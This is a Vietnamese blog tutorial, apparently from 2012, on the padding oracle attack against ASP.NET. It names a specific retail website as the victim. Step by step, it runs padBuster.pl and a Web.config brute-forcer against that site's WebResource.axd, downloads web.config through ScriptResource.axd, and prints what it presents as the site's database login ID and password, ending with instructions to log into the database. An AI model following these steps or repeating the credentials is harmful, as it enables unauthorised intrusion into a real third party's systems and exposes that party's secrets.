Trang chủ
»
Hacking and Security
» [TUT] Padding Oracle Attack
21 thg 8, 2012
[TUT] Padding Oracle Attack
Victim: http://bigc.vn/Kiểm tra lỗi Padding Orale
View source:
Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=63 4538991637902500"
Bước 1: Chuẩn bị Tools
Trước tiên cần cài đặt perl:
http://www.activestate.com/activeperl/downloads
Coppy 2 file padBuster.pl và Web.config_bruter.pl sau vào ổ C:
padBuster.pl:
http://www.mediafire.com/?a0auo2tca0ffdfe
Web.config_bruter.pl:
http://www.mediafire.com/?3twc9xwizdcdw8p
pass unlock: soleil_vhb
pass giải nén: ceh.vn
Bước 2: Thực hiện lệnh trên CMD
vào Run command
Cd\
Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=Opd...NJHaBhjNiUZ7g2OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"
Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:
“The ID# marked with ** is recommended: “
Lúc này ta sẽ nhập số 2 và ấn enter
Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:
M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0
Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:
Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8
Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau:
Kết quả:
u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1
gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1
Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả
Bước 3: Lấy thông tin file config:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
hoặc:
http://bigc.vn/ScriptResource.axd?d=...xCAAAAAAAAAAA1
Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi
Bước 4: login vào Database
Sử dụng tool: MySQL management studio express
http://www.scottsystems.com/products..._ce/downloads/
Slide: http://www.mediafire.com/view/?u1qczh2b7ip45sw
Không có nhận xét nào:
Đăng nhận xét